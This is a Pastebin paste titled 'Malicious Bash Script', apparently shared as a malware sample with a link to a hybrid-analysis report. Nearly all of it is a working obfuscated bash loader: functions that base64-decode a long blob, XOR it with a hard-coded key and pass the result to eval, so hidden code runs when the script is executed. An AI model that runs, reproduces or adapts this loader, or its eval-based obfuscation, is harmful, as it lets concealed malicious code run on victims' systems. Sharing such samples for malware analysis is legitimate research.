Advertisement
dissectmalware

Malicious Bash Script

Nov 5th, 2018
522
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.98 KB | None | 0 0
  1. # https://www.hybrid-analysis.com/sample/dcf4e7a0bab23dd2eacdf160dc99ef6982590033b0e5aba675f85f2832ab5446?environmentId=300
  2. #!/bin/bash
  3. _l() {
  4.     _i=0;_x=0;
  5.     for ((_i=0; _i<${#1}; _i+=2)) do
  6.         __return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
  7.         if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
  8.     done
  9.     if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
  10. }
  11.  
  12. _m() {
  13.     _v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
  14.     __return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
  15.     if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
  16. }
  17. _y="4757508878"
  18. _t="MTcxNjFhNTU1YzVlMTc1YTU2NGI1YzNkNWE0NDZhNDY1ZDRhNDQ1MTViNTkwODE1MTExODRiNGY2ODRlNTE0NTQ2MTcxODQwNGE1NzUzNGQ1NzQzNjM1MjQ3NDM1MTU3NTkxMTE2M2Q0NjUyNDY0MzUxNTc1OTY3NTM0MjVjNTMwODEyMWMxMDQyNGQ1ZDUzNTI1MjViMTkxYTMyNWE1OTU3NWY1YzU5NTA2ZjUxNWMwYTFhMTAxZjUwNTQ1ZDVmMTgxNTU5MTgxNjEzMWQ1ZTVhNDI1ZDVmMTcxNTQ2NTMwNDE3MTg1MzE4NzE3ODY4NTg1NjQxNTE1YTQyNTU3ZDRmNDg1MTQ1NDE3MzUwNDY1MTViNTIxODQ4MTc1MjQ1NTA0MDE4MTU1ODE4MTMxNTdjNzg2NTVjNTk0YzUxNTc0NjVhNjA2MjdjNzQxYTE4MGExODE2NmIxZDE5MWY2YzExMWExMDE4NDgxNzQ2NTI1MTEwMTU3ZDE3MTU1YTE3MTI0NDc1MWUxMjFhMWY2MzZhMTU2ODFjMWMxMjc4NjQwNjc4NDQxMDFjMTUxNTRjMTg0YzQ1MTgxOTUzNTYxNzEyNmI2MzAyNDc0YTVkNTk0MTBkNjg2ZDFmMTExNTMyNDE0NTU5MGExNzU4NGM0YzQ3MDIxYjE4NTQ0NzVjMWU1YTRhNTg0ZjQ3NTI0NzVlNWI0NDVkNGE1ODQ4MWE1NDVhNWExYTQzNWMxNzA4NWIwOTAzMDc3OTRjNTI2OTA1MGExZTQxMGExMTVhNTQ1MzUwNTE1OTVkNmI1ZTUxMTE0NjBkMWM0YjUyNGI0NzVlNWE1OTZhNTc0ZDUxNTMxZTViMGExMTU4NDY2ZjRlNWQ0NTRiNWQ1ODViMTE1NzBkMGMwZjAyMGYwMTA3MGQwZjAyMDgxYTMyNDI1NjRlNWU0NTY4NDU1MTRiNGI0MDU3NDY1MzA4MTUwZDA3MDAwMDA3MGQwMzAyMDIwMzAzMDkwZDBjMDAwZDAzMDIwNTBmMGQwNzAwMWEzZDRjNTk0NzZhNDc1NDQ0NTAwNTE1MWMxYzVhNWU0MzUwNWQ0ODE4MTg0YzU5NDcxYTZmNmQ2ODYwNjA2ZjYwNmM2ZjFjMTUzZjUzNGQ0YTViMTgxOTUxMDU3YjE1MTIxYzRkNDU1NDE2MTcwYjE4NTE1NTRlMTc1OTRkNTg1YjE1MDUwYjE2MDkxODA5MDYxMDQzNTg0NzZhNDA1OTRjNWYzMjU1NDc0NTY4NTE1OTRhMDUxNTFjMWM1YTVlNDM1MDVkNDgxODFhNWMxNDE4NDE1YTQ1MWY2MDYwNmY2MDZjNmY2ZDZmMWMxZjFhMzI0MjU2NGU1ZTQ1MTcxODYwMTgxYTEzNGQ1YTRkNWM0NzZhNDA1OTRiNDQ0ZjViNDU1MTE1MTUxMjFjNGM1YTQ4NmI0NzU0NDM1ZDEyMTgxNTUzMTgxNjEzNTQ0NzQ1NmY1YzUxNDUxYTE0MDkxNTE4NTE1NTRlMTc1OTRkNTg1YjE1MDUwYjE2MDkzMjQ1NTUxNDFhNTMxNzExNDQ1NTQ4Njg0ODU1NDM1ZDNkNTM1OTU0NWQ2ODU2NTU1YTUwMGExNzE0MTA1ZjQ1NWQ0NDE3MTg1YTA0MTAxNTRlMTcxYTFlMTk1NDQ3NDUxMjE4MDQxZjU0NDcxNzE4MDYxNTEyMWM1OTQ3NDg2YjUzNWM0NTE3MTkxMTFhM2Q0ZTViNWI0MDVhNTA2ZjU2NTk1YTVkMDkxNTExMWY1MDUzNTA1NzE3MTU1YTE3MTcxMzY1Njc3YzFhMTc0NDE0NDQ1MDUzMTUxZDdkMTgxYTU2MTQxMDQ2Nzc2YjE4MTc2ZTU4NTQ0MTVhNTA0NDFhNmI2NjE3NmExMzFkMTgxYjFkNzU2YzA5Nzg0NzFmMWQxNTNmNDE1YTVjNGQ1NTUyNjc1YTU2NTg1MjA4MTIxYzQzNDE1NzU4NDI1ODUyNmE1ZTU5NTU1MjE3MWIxNzFhMTIwNzAwNDUxYTNkNWI1YzVhNWE1MzE1MWI0MDE4MTUxYzU1NDc0NTY4NTE1OTRhMWM1MTUxNTg1MjZhNTk1NDVkNWQxNzc0NTc1YTQzNTA1OTQxNDMxNzc1NTY1YjdiNjQxNzE4MWYzYTU3NDg1MjU2MTQxYTU0MTcxNzE0NTk0ODQ3Njc1MDVlNDcxMzUzNTk1NDVkNjg1NjU1NWE1MDE1MTUxZDE1NTk0NTVmNDcxNzE3NDQxNzEwMWExYzQ0NWQ0NzQ0NWM1ODViNmY1ZjRkNWU1YzE2MTcxNzEzNDM1ZjU0NGQ1YTVkNmI1OTU0NWE1MDEy"
  19. eval "$(_m "$_t" "$_y")"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement